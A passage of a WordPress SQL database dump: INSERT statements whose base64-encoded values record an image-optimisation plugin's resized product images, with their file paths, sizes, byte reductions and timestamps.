CJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItMTgweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDE2NywiaWQiOjEyNDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpY2FsLWNoZW1pY2Fscy1lMTQ3MzE3NjEyMzc3Mi0yNDd4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItMjQ3eDY4LmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItMjQ3eDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDE2OSwiaWQiOjEyNDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpY2FsLWNoZW1pY2Fscy1lMTQ3MzE3NjEyMzc3Mi0zMDB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItMzAweDY4LmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItMzAweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDE3MSwiaWQiOjEyNDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpY2FsLWNoZW1pY2Fscy1lMTQ3MzE3NjEyMzc3Mi00MDB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItNDAweDY4LmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItNDAweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDE3MywiaWQiOjEyNDR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29670, 1242, 'wpfc_optimisation_reduction', '1344'); 
INSERT INTO `wp_postmeta` VALUES (29671, 1242, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdmVudC1jbGVhbmVycy1lMTQ3MzE3NDY2MTM5Mi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NvbHZlbnQtY2xlYW5lcnMtZTE0NzMxNzQ2NjEzOTIuanBnIiwid2lkdGgiOjk0NSwiaGVpZ2h0Ijo2OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NvbHZlbnQtY2xlYW5lcnMtZTE0NzMxNzQ2NjEzOTIuanBnIiwicmVkdWN0aW9uIjo3NDgsInRpbWUiOjE0ODM1NzQxODAsImlkIjoiMTI0MiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdmVudC1jbGVhbmVycy1lMTQ3MzE3NDY2MTM5Mi0zNDB4NjguanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTM0MHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTM0MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQxODIsImlkIjoxMjQyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NvbHZlbnQtY2xlYW5lcnMtZTE0NzMxNzQ2NjEzOTItODAweDU4LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdmVudC1jbGVhbmVycy1lMTQ3MzE3NDY2MTM5Mi04MDB4NTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc29sdmVudC1jbGVhbmVycy1lMTQ3MzE3NDY2MTM5Mi04MDB4NTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MTg0LCJpZCI6MTI0Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTc2OHg1NS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjU1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NvbHZlbnQtY2xlYW5lcnMtZTE0NzMxNzQ2NjEzOTItNzY4eDU1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NvbHZlbnQtY2xlYW5lcnMtZTE0NzMxNzQ2NjEzOTItNzY4eDU1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDE4NywiaWQiOjEyNDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdmVudC1jbGVhbmVycy1lMTQ3MzE3NDY2MTM5Mi0yNTB4NjguanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTI1MHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTI1MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQxODksImlkIjoxMjQyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NvbHZlbnQtY2xlYW5lcnMtZTE0NzMxNzQ2NjEzOTItMjAweDY4LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdmVudC1jbGVhbmVycy1lMTQ3MzE3NDY2MTM5Mi0yMDB4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc29sdmVudC1jbGVhbmVycy1lMTQ3MzE3NDY2MTM5Mi0yMDB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MTkxLCJpZCI6MTI0Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTIyNXg2OC5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NvbHZlbnQtY2xlYW5lcnMtZTE0NzMxNzQ2NjEzOTItMjI1eDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NvbHZlbnQtY2xlYW5lcnMtZTE0NzMxNzQ2NjEzOTItMjI1eDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDE5MywiaWQiOjEyNDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdmVudC1jbGVhbmVycy1lMTQ3MzE3NDY2MTM5Mi01MTB4NjguanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTUxMHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTUxMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQxOTUsImlkIjoxMjQyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdmVudC1jbGVhbmVycy1lMTQ3MzE3NDY2MTM5Mi0xMTR4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdmVudC1jbGVhbmVycy1lMTQ3MzE3NDY2MTM5Mi0xMTR4NjguanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTExNHg2OC5qcGciLCJyZWR1Y3Rpb24iOjM1NSwidGltZSI6MTQ4MzU3NDE5NywiaWQiOjEyNDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTE2MHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTE2MHg2OC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NvbHZlbnQtY2xlYW5lcnMtZTE0NzMxNzQ2NjEzOTItMTYweDY4LmpwZyIsInJlZHVjdGlvbiI6OTEsInRpbWUiOjE0ODM1NzQxOTksImlkIjoxMjQyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdmVudC1jbGVhbmVycy1lMTQ3MzE3NDY2MTM5Mi0xODB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdmVudC1jbGVhbmVycy1lMTQ3MzE3NDY2MTM5Mi0xODB4NjguanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTE4MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjE0MCwidGltZSI6MTQ4MzU3NDIwMiwiaWQiOjEyNDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTI0N3g2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTI0N3g2OC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NvbHZlbnQtY2xlYW5lcnMtZTE0NzMxNzQ2NjEzOTItMjQ3eDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDIwNCwiaWQiOjEyNDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTMwMHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTMwMHg2OC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NvbHZlbnQtY2xlYW5lcnMtZTE0NzMxNzQ2NjEzOTItMzAweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDIwNiwiaWQiOjEyNDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTQwMHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2ZW50LWNsZWFuZXJzLWUxNDczMTc0NjYxMzkyLTQwMHg2OC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NvbHZlbnQtY2xlYW5lcnMtZTE0NzMxNzQ2NjEzOTItNDAweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDIwOCwiaWQiOjEyNDJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29672, 1241, 'wpfc_optimisation_reduction', '1487'); 
INSERT INTO `wp_postmeta` VALUES (29673, 1241, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLWUxNDczMTc0NTU1OTI5LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLWUxNDczMTc0NTU1OTI5LmpwZyIsIndpZHRoIjo5NDUsImhlaWdodCI6NjgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjkuanBnIiwicmVkdWN0aW9uIjo4MDgsInRpbWUiOjE0ODM1NzQyMTUsImlkIjoiMTI0MSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLWUxNDczMTc0NTU1OTI5LTM0MHg2OC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci1lMTQ3MzE3NDU1NTkyOS0zNDB4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLWUxNDczMTc0NTU1OTI5LTM0MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQyMTcsImlkIjoxMjQxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci1lMTQ3MzE3NDU1NTkyOS04MDB4NTguanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktODAweDU4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci1lMTQ3MzE3NDU1NTkyOS04MDB4NTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MjE5LCJpZCI6MTI0MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktNzY4eDU1LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLWUxNDczMTc0NTU1OTI5LTc2OHg1NS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktNzY4eDU1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDIyMSwiaWQiOjEyNDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLWUxNDczMTc0NTU1OTI5LTI1MHg2OC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci1lMTQ3MzE3NDU1NTkyOS0yNTB4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLWUxNDczMTc0NTU1OTI5LTI1MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQyMjMsImlkIjoxMjQxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci1lMTQ3MzE3NDU1NTkyOS0yMDB4NjguanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktMjAweDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci1lMTQ3MzE3NDU1NTkyOS0yMDB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MjI1LCJpZCI6MTI0MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktMjI1eDY4LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLWUxN